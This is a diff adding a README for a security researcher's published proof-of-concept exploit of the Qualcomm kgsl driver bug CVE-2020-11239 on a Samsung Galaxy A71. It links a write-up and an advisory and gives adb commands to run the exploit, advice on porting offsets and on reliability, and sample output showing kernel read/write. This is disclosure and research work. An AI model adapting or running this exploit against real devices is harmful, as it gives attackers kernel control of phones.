|
| 1 | +## Exploit for Qualcomm CVE-2020-11239 |
| 2 | + |
| 3 | +The write up can be found [here](https://securitylab.github.com/research/one_day_short_of_a_fullchain_android). This is a bug in the Qualcomm kgsl driver I reported in July 2020. The GitHub Advisory can be found [here](https://securitylab.github.com/advisories/GHSL-2020-375-kgsl). The bug can be used to gain arbitrary kernel code execution, read and write from the untrusted app domain. |
| 4 | + |
| 5 | +The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXUATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683. The offsets in the exploit refers to that version of the firmware. For different models of phones, the macro `DMA_ADDRESS`, which indicates the address of the SWIOTLB buffer, will also need to be changed. |
| 6 | + |
| 7 | +The exploit is reasonably reliable, although it does need to wait a few minutes after start up, after the kernel activities settled down before running. |
| 8 | + |
| 9 | +The most likely cause of failure is when it failed to locate the file structs after 5 retries. In this case there is no adverse effect and the phone will not crash. However, running the exploit immediately is unlikely to succeed and it usually requires waiting for a bit or doing something else to reorganize the heap before running it again. |
| 10 | + |
| 11 | +To test, cross compile the file `kgsl_exploit_slab_a71.c` and then execute with `adb`: |
| 12 | + |
| 13 | +``` |
| 14 | +adb push kgsl_exploit_slab_a71 /data/local/tmp |
| 15 | +adb shell |
| 16 | +a71:/ $ /data/local/tmp/kgsl_exploit_slab_a71 |
| 17 | +``` |
| 18 | + |
| 19 | +If succeeded, it will run a eBPF program to write and read to an address and confirm the successful read and write: |
| 20 | + |
| 21 | +``` |
| 22 | +rpc opened |
| 23 | +[+] reallocation data initialized! |
| 24 | +[ ] initializing reallocation threads, please wait... |
| 25 | +[+] 8 reallocation threads ready! |
| 26 | +micros_used: 19432 |
| 27 | +[+] REALLOC THREAD finished |
| 28 | +[+] REALLOC THREAD finished |
| 29 | +[+] REALLOC THREAD finished |
| 30 | +[+] REALLOC THREAD finished |
| 31 | +[+] REALLOC THREAD finished |
| 32 | +[+] REALLOC THREAD finished |
| 33 | +[+] REALLOC THREAD finished |
| 34 | +[+] REALLOC THREAD finished |
| 35 | +[+] Read/Write operation succeeded |
| 36 | +[+] syncing bounce buffers |
| 37 | +done read 0 |
| 38 | +[+] Found null_fops at 2 region offset 32 ffffff80099d9788 |
| 39 | +null file addr: ffffffc12a993058 |
| 40 | +[+] ion region location: ffffffc12a992000 |
| 41 | +[+] bpf addr: ffffff8008317088 |
| 42 | +overwrite fops ffffff80099d9788 |
| 43 | +overwrite fops 0 |
| 44 | +[-] Failed to find dma_buf_fops |
| 45 | +[+] syncing bounce buffers |
| 46 | +[+] reallocation data initialized! |
| 47 | +[ ] initializing reallocation threads, please wait... |
| 48 | +[+] 8 reallocation threads ready! |
| 49 | +micros_used: 19938 |
| 50 | +[+] REALLOC THREAD finished |
| 51 | +[+] REALLOC THREAD finished |
| 52 | +[+] REALLOC THREAD finished |
| 53 | +[+] REALLOC THREAD finished |
| 54 | +[+] REALLOC THREAD finished |
| 55 | +[+] REALLOC THREAD finished |
| 56 | +[+] REALLOC THREAD finished |
| 57 | +[+] REALLOC THREAD finished |
| 58 | +[+] Read/Write operation succeeded |
| 59 | +running bpf program |
| 60 | +bpf_data 0x3039 |
| 61 | +[+] successful read |
| 62 | +``` |
0 commit comments